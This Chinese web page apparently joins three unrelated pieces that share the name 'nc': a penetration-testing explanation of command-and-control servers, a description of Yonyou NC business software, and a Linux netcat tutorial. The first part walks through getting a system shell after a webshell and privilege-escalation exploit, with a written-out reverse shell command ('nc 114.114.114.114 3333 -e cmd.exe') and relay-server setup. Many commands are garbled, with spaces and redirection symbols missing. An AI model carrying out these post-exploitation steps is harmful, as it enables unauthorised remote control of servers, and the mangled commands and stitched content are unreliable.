nc服务器？NC服务器是干嘛的

什么是C&C服务器

C&C服务器的全称是 Command and Control Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个 webshell的时候，需要对服务器进行提权操作，如果是一台 windows的服务器，提权的时候通常是利用本地提权漏洞的 exp进行溢出提权，有些 exp可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的 exp溢出成功之后是返回一个 system权限的 cmd，这时就需要将低权限的 cmd shell反弹回本地，这里用 nc在本地执行：nc-vv-lp 3333

上述命令的意思是在本地监听一个 3333端口等待连接，假设电脑 IP是公网的，并且 IP为 114.114.114.114，然后在目标服务器就可以执行：nc 114.114.114.114 3333-e cmd.exe

上面的命令就可以把远程服务器的服务器权限的 cmd shell返回到本地，这时你就可以通过 nc建立的这个 shell进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的 C&C服务器。

扩展资料：

C&C服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网 IP地址是：111.111.111.111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

用友nc 是什么架构

用友NC是基于客户端/服务器架构和互联网架构的一种企业管理软件。以下是详细的解释：

一、客户端/服务器架构

用友NC采用典型的两层或三层架构的客户端/服务器模式。在这种架构中，客户端负责用户界面和部分业务逻辑，而服务器端则负责处理主要的业务逻辑和数据存储。这种设计使得系统具有较好的响应速度和用户体验，同时保证了数据的安全性和完整性。此外，客户端/服务器架构还便于系统的扩展和维护。

二、互联网架构

随着互联网技术的发展，用友NC也融入了互联网架构。这种架构允许用户通过浏览器等网络工具，在任何地点、任何时间访问系统，实现了远程办公和移动办公的需求。同时，互联网架构使得用友NC可以轻松地与其他互联网应用进行集成，提高了企业信息化的整体水平。

三、系统特点

用友NC的架构设计使其具有以下特点：

1.稳定性高：采用成熟的架构设计和先进的技术，保证了系统的稳定性和可靠性。

2.扩展性强：无论是客户端还是服务器端，系统都具有良好的扩展性，可以方便地增加新的功能和模块。

3.安全性好：严格的数据管理和权限控制机制，保证了数据的安全性和系统的稳定运行。

4.用户体验优良：友好的用户界面和高效的响应速度，提高了用户的工作效率。

综上所述，用友NC是基于客户端/服务器架构和互联网架构的企业管理软件，其设计旨在为企业提供高效、稳定、安全的信息化管理解决方案。

Linux系统中nc命令的基本用法掌握

功能说明：功能强大的网络工具(￣▽￣)，在网络工具中有瑞士军刀美誉，其有Windows和Linux的版本。因为它短小精悍,功能实用，被设计为一个简单、可靠的网络工具，可通过TCP或UDP协议传输读写数据。同时，它还是一个网络应用Debug分析器，因为它可以根据需要创建各种不同类型的网络连接。

nc可以提供如下的网络功能:

1)监听特定端口,这时候nc就可以作为一个服务器,但是我发现这样使用nc生成的服务器仅仅是一个echo服务器而已,没有其他更加强大的功能.

2)连接特定端口,这时候nc就成为了一个客户端,同样的,也是一个简单的客户端,只能起echo的作用.

3)扫描端口,这可以作为查询某个机器上是否开启了某个端口.

几个具体的使用例子

例子1：

使用nc打开linux下的特定端口

nc-lp 23（即telnet）

netstat-an|grep 23（查看端口是否正常打开）

例子2：

使用nc进行文件传输，命令

ssh root@www.freetstar.com( nc-l 10003 destination 2/dev/null) cat source| nc www.freetstar.com 10003

前边ssh登录到远程主机www.freetstar.com上，用nc命令打开本地的10003端口,成为后台进程

后边，在本地机器上打开source文件，并将其重定向到www.freetstar.com的10003号端口，也就是让远程www.freetstar.com主机10003号端口接收source文件

例子3：

使用nc扫描linux下的特定端口

nc-v-z host.example.com 70-80

扫描端口(70到80)，可指定范围。-v输出详细信息。

例子4：

克隆硬盘或分区

类似于例子2，只需要由dd获得硬盘或分区的数据，然后传输即可。

克隆硬盘或分区的操作，不应在已经mount的的系统上进行。所以，需要使用安装光盘引导后，进入拯救模式（或使用Knoppix工具光盘）启动系统后

server1上执行：# nc-l-p 1234| dd of=/dev/sda

server1上执行1234号端口监听，将得到的文件保存到/dev/sda上

server2上执行：# dd if=/dev/sda| nc server1 1234

例子5：

保存Web页面

while true; do nc-l-p 80-q 1 somepage.html; done

例子6：

模拟HTTP Headers

[root@hatest1~]# nc www.huanxiangwu.com 80

GET/ HTTP/1.1

Host: ispconfig.org

Referrer: mypage.com

User-Agent: my-browser

在nc命令后，输入红色部分的内容，然后按两次回车，即可从对方获得HTTP Headers内容。

例子7：

聊天

server1上监听1234端口[root@hatest2 tmp]# nc-lp 1234

server2上向server1的1234端口发送消息[root@hatest1~]# nc server1 1234

这样，双方就可以相互交流了。使用Ctrl+D正常退出。

更多的使用，查看man手册

nc example.host port打开与example.host主机的port的一个TCP链接.如果链接失败,不显示任何错误信息,仅仅退出

nc-p 31337-w 5 example.host 42打开与example。host主机的42号端口的一个TCP链接。用31337作为源端口,超时链接时间为5秒

nc-u example.host 53指定协议为udp协议

语法：nc [-hlnruz][-g网关...][-G指向器数目][-i延迟秒数][-o输出文件][-p通信端口][-s来源位址][-v...][-w超时秒数][主机名称][通信端口...]

参数：

-g网关设置路由器跃程通信网关，最多可设置8个。

-G指向器数目设置来源路由指向器，其数值为4的倍数。

-h在线帮助。

-i延迟秒数设置时间间隔，以便传送信息及扫描通信端口。

-l使用监听模式，管控传入的资料。

-n直接使用IP地址，而不通过域名服务器。

-o输出文件指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。

-p通信端口设置本地主机使用的通信端口。

-r乱数指定本地与远端主机的通信端口。

-s来源位址设置本地主机送出数据包的IP地址。

-u使用UDP传输协议。

-v显示指令执行过程。

-w超时秒数设置等待连线的时间。

-z使用0输入/输出模式，只在扫描通信端口时使用。

来看下它的基本用法:

1.监听本地端口

复制代码

代码如下:

root@10.1.1.43:~# nc-l-p 1234

root@10.1.1.43:~# netstat-tunlp| grep 1234

tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 15543/nc

2.端口扫描

复制代码

代码如下:

root@10.1.1.43:~# nc-v-w 10 10.1.1.180 80

(UNKNOWN) [10.1.1.180] 80(www) open

复制代码

代码如下:

root@10.1.1.43:~# nc-v-w 10 10.1.1.180-z 80-30000

(UNKNOWN) [10.1.1.180] 22000(?) open

(UNKNOWN) [10.1.1.180] 80(www) open

3.文件传出

源10.1.1.43 text.txt

目的 10.1.1.180

复制代码

代码如下:

root@10:~# nc-l-p 1234 test.txt#开10.1.1.180:1234端口监听，并将socket传输过来的数据重定向到test.txt文件 test 43 nc

root@10.1.1.43:~#cat test.txt

root@10.1.1.43:~# nc 10.1.1.180 1234 test.txt#连接远程的10.1.1.180，从test.txt的路径从定向到socket，从而将文件传输到远方。

root@10:~# cat test.txt

test 43 nc

4.目录传输

源10.1.1.43 python_program

目的 10.1.1.180

复制代码

代码如下:

root@10:~# nc-l-p 1234| tar xzvf-

root@10.1.1.43:~# tar czvf- python_program| nc 10.1.1.180 1234

python_program/

python_program/1.py

python_program/4.py

python_program/3.py

5.测试UDP端口

复制代码

代码如下:

root@172.16.211.34:web# netstat-tunlp

Active Internet connections(only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1111/sshd

udp 0 0 0.0.0.0:68 0.0.0.0:* 887/dhclient

复制代码

代码如下:

root@172.16.211.35:~# nc-vuz 172.16.211.34 68

Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!